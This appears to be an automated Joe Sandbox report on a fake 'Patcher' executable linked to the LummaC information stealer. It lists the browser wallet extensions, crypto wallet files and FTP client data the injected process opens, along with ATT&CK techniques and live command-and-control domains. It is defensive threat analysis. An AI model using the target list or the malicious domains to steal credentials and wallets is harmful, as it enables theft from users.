                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)231
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection
                NTDS231
                Virtualization/Sandbox Evasion
                Distributed Component Object Model2
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials33
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Patcher_I5cxa9AN.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://cureprouderio.click/$&%W&100%Avira URL Cloudmalware
                https://cureprouderio.click/100%Avira URL Cloudmalware
                https://cureprouderio.click/api9100%Avira URL Cloudmalware
                https://cureprouderio.click/pi100%Avira URL Cloudmalware
                https://cureprouderio.click/bu100%Avira URL Cloudmalware
                https://cureprouderio.click/api(100%Avira URL Cloudmalware
                https://cureprouderio.click/gg100%Avira URL Cloudmalware
                cureprouderio.click100%Avira URL Cloudmalware
                https://cureprouderio.click/jh100%Avira URL Cloudmalware
                https://cureprouderio.click/api100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                cureprouderio.click
                172.67.132.7
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  cureprouderio.clicktrue
                  • Avira URL Cloud: malware
                  unknown
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            https://cureprouderio.click/apitrue
                            • Avira URL Cloud: malware
                            unknown
                            framekgirus.shopfalse
                              high
                              tirepublicerj.shopfalse
                                high
                                abruptyopsn.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://cureprouderio.click/api9aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgaspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cureprouderio.click/$&%W&aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaaspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cureprouderio.click/api(aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cureprouderio.click/aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770621698.00000000053BD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://cureprouderio.click/jhaspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cureprouderio.click/piaspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cureprouderio.click/buaspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.microsofaspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cureprouderio.click/ggaspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.132.7
                                                                                        cureprouderio.clickUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1584554
                                                                                        Start date and time:2025-01-05 20:41:04 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 3m 41s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:3
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Patcher_I5cxa9AN.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 37
                                                                                        • Number of non-executed functions: 116
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated
                                                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Patcher_I5cxa9AN.exe
                                                                                        TimeTypeDescription
                                                                                        14:41:54API Interceptor8x Sleep call for process: aspnet_regiis.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.67.132.7Loader.exeGet hashmaliciousLummaCBrowse
                                                                                          https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#Get hashmaliciousUnknownBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            cureprouderio.clickLoader.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.132.7
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSdrop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                            • 172.67.74.152
                                                                                            DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.112.1
                                                                                            CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.96.3
                                                                                            installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.208.58
                                                                                            Installer_x64.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 104.21.32.1
                                                                                            Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            Aura.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 104.21.80.1
                                                                                            loader.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.75.163
